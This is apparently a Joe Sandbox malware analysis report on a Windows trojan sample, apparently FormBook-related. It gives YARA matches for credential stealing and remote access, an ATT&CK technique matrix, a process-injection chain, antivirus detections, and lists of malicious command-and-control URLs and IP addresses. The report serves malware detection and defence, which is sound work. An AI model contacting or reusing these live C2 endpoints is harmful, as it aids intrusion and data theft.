
          Stealing of Sensitive Information

          Source: Yara match, File source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match, File source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 12 Native API | Path Interception | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 3 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 512 Process Injection | 3 Obfuscated Files or Information | 1 Input Capture | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 Software Packing | Security Account Manager | 115 System Information Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Rootkit | NTDS | 241 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Virtualization/Sandbox Evasion | LSA Secrets | 2 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 512 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph (image not reproduced): ID: 825979, Sample: YSpCB8DEek.exe, Startdate: 14/03/2023, Architecture: WINDOWS, Score: 100
          Process chain shown in the graph: YSpCB8DEek.exe (started) -> afhjjq.exe (dropped as C:\Users\user\AppData\Local\Temp\afhjjq.exe, PE32; started) -> afhjjq.exe (started) -> explorer.exe (injected) -> control.exe (started) -> cmd.exe (started) -> conhost.exe (started)

          Source | Detection | Scanner | Label
          YSpCB8DEek.exe | 49% | ReversingLabs | Win32.Trojan.Nsisx
          YSpCB8DEek.exe | 100% | Joe Sandbox ML |
          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\afhjjq.exe | 100% | Avira | HEUR/AGEN.1242497
          C:\Users\user\AppData\Local\Temp\afhjjq.exe | 30% | ReversingLabs | Win32.Trojan.Generic
          Source | Detection | Scanner | Label
          1.2.afhjjq.exe.12f0000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.afhjjq.exe.1320000.0.unpack | 100% | Avira | HEUR/AGEN.1242497
          2.0.afhjjq.exe.1320000.0.unpack | 100% | Avira | HEUR/AGEN.1242497
          2.2.afhjjq.exe.1320000.3.unpack | 100% | Avira | HEUR/AGEN.1242497
          2.2.afhjjq.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          No Antivirus matches
          Source | Detection | Scanner | Label
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          linnus.shop | 2.57.90.16 | true | true | | unknown
          www.incentiveexcellence.com | 66.113.136.229 | true | true | | unknown
          overdue.aliyun.com | 170.33.13.246 | true | false | | high
          www.linnus.shop | unknown | unknown | true | | unknown
          www.swegon.tech | unknown | unknown | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://www.incentiveexcellence.com/nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=VJV0NBieu5xy/+V3NiTJfFE8YIFhNCyGpCPWTH7L7kDRU9vDU50p89IeJ9KbRODmgBA3 | true | Avira URL Cloud: malware | unknown
          http://www.linnus.shop/nes8/?5jDX=+Cx+hhlra2ZnBXtbtOqG2CKZ6fBbmHz3v/4koY00IQGXr6Dpm6w3htg1kyr9LcS3Cwl2&wP=KB3xslvhyf-4Q2Gp | true | Avira URL Cloud: malware | unknown
          http://www.swegon.tech/nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 | true | Avira URL Cloud: malware | unknown
          www.n7m.tokyo/nes8/ | true | Avira URL Cloud: malware | low

          Name | Source | Malicious | Antivirus Detection | Reputation
                    • Avira URL Cloud: safe
                    unknown
                    http://www.hallmarklog.liveReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.marketproinv.infoReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.enakslot.net/nes8/www.wordybag.onlineexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.dietoll-official.site/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.linnus.shop/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.swegon.techReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.prvtg.topReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.wordybag.onlineReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://redirect.aaaq.com/location.cgi?dn=incentiveexcellence.comexplorer.exe, 00000003.00000002.589685379.00000000159BF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.577071198.000000000509F000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.wordybag.online/nes8/www.dietoll-official.siteexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.wordybag.onlineexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.jinglunqhd.comReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.innovativanimal.com/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.naturetechvr.comReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.yaxin376.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.purityrecruitment.com/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000002.572601902.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.335123598.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321913311.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586876911.000000000ED28000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      http://www.dietoll-official.site/nes8/www.hallmarklog.liveexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://www.jinglunqhd.com/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://www.yaxin376.com/nes8/www.enakslot.netexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://www.hallmarklog.live/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://www.n7m.tokyo/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://www.innovativanimal.com/nes8/www.yaxin376.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://www.innovativanimal.comReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://nsis.sf.net/NSIS_ErrorErrorYSpCB8DEek.exefalse
                        high
                        http://www.prvtg.topexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.hadafsazan.netexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.purityrecruitment.com/nes8/www.marketproinv.infoexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.incentiveexcellence.comReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.n7m.tokyoexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.swegon.techexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.swegon.tech/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.enakslot.netReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.incentiveexcellence.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.linnus.shop/nes8/www.incentiveexcellence.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.jinglunqhd.com/nes8/www.hadafsazan.netexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.yaxin376.comReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.linnus.shopexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.incentiveexcellence.com/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.hadafsazan.netReferer:explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.enakslot.net/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.n7m.tokyo/nes8/www.jinglunqhd.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.hadafsazan.net/nes8/www.naturetechvr.comexplorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.wordybag.online/nes8/explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
170.33.13.246 | overdue.aliyun.com | Singapore | 134963 | ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimited | false
2.57.90.16 | linnus.shop | Lithuania | 47583 | AS-HOSTINGERLT | true
66.113.136.229 | www.incentiveexcellence.com | United States | 3064 | AFFINITY-FTLUS | true
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 825979
Start date and time: 2023-03-14 07:24:16 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: YSpCB8DEek.exe
Original Sample Name: d927de8cecb8523b956d2bb2098d20ef.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@10/5@4/3
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 66.6% (good quality ratio 63.3%)
• Quality average: 78.6%
• Quality standard deviation: 28.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 64
• Number of non-executed functions: 48
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: YSpCB8DEek.exe
Time | Type | Description
07:26:00 | API Interceptor | 630x Sleep call for process: explorer.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        2.57.90.16Image_0000384757.vbsGet hashmaliciousFormBookBrowse
                        • www.banyanwings.com/nbys/?bj=ZlP0QxCqErEBx/Ukp51TnVSNqvRCD4HlZmTgtTpg8+j4FdKcIkmiCp1LSayazaaXMCXS9xnz1gwcYx9w3WCi38SCxVG9ApFCUA==&kfh=KmQsQQxqanX
                        DHL_Express_INVOICE_AWB_CI_BL_PDF.exeGet hashmaliciousFormBookBrowse
                        • www.skydroptechpro.online/obq4/?q8Sl=-n1ukQ3-jf&DYe=O4Kw6I5T3ULir4gzZWVtxtlpTI0Xhv5Z9MJtWBtRaS4c1n7Nbxc6ZCmo0BQtKkUi3boHTZmgDY9cM82V2qzacbKO3ZiGXl8Now==
                        o0G3mAJ7Ud.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.matchstats.site/hd4e/?Qt=lYdUIJGUVfOMODqAAXh0TMgvP1NUa0ctVgZnf2kvPSSOyyYWOxQ12uw4w2TsX3Nzs62FBNqY+O4mwbtHkuHzz05VGi4U1KiTHQ==&szm=-piDmSHeQ-mzBSst
                        hesaphareketi-01.PDF.exeGet hashmaliciousFormBookBrowse
                        • www.laylaroseuk.com/rdc9/?XC=4/fKm8asbTalW9RWsTSzxzAj8H/LArOnS31W3fbZiWi/U2Uh1mQWp9sYVj4sAPPFJPArLgELXNM77N7vzJ6IjHyHaCaMr7760g==&C8ZG6S=AfiTWQjWI
                        739202_931_pdf.vbsGet hashmaliciousFormBookBrowse
                        • www.vendasprimeonline.shop/iqt8/?IXGw=0QX1l2OeDwMpaxeqxEW+JXcuArmpinAWqSRJCRyWMWgRb3jXznFe4458Hddjl3D42Q8gA00op4e89zQwlB/r0C2pAczxFF19FA==&opYA=Y4QDjocjo7k
                        Aviso pagamento_08.03.2023.025104938.vbsGet hashmaliciousFormBookBrowse
                        • www.adacaranya.com/c5c8/?Nlsq=hn6k7-Uln&5VG=h5rcAevXt+B0Hok/M4bRSj6S/xc/RdXlkaS1XyqlLKZ2VoArp8Rieq5N5LkoGLhjtAzu1x7Q5jSNw4h2XGlSxBkuzvTVn20g9A==
                        sgK6Q5E4s9.exeGet hashmaliciousFormBookBrowse
                        • www.daylifesci.com/k4xe/?v_kG1oL=uDCgPSd/PCk66Fp6bpwMbo/nV2yNBUYvuSEQDxF8zt5G0gSpqrRMvgPXw3yjuTCiAKpnKQK9zpx7T+Nk7hey6oQUclMdRsEW8w==&owhLjZ=WxonvDEKZf3H9
                        E-DEKONT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.lecoledu4emeage.com/gg84/?4h9=0jl37nQyisdHj9++mwRPJy+xxTODqjX2ku6HL2RD1bf8jTWL05XNFhhTfMwT6fCm5Y+j&DB64X=4hQ8XH500XQ
                        youT1etAW5.exeGet hashmaliciousFormBookBrowse
                        • www.seufi.com/qsqm/
                        Aviso pagamento_07.03.2023.025104938.vbsGet hashmaliciousFormBookBrowse
                        • www.adacaranya.com/c5c8/?Lz15=tniK5ISyTfh&yWFo=h5rcAevXt+B0Hok/M4bRSj6S/xc/RdXlkaS1XyqlLKZ2VoArp8Rieq5N5LkoGLhjtAzu1x7Q5jSNw4h2XGlSxBkuzvTVn20g9A==
                        doc03400720230214100634.exeGet hashmaliciousFormBook, GuLoaderBrowse
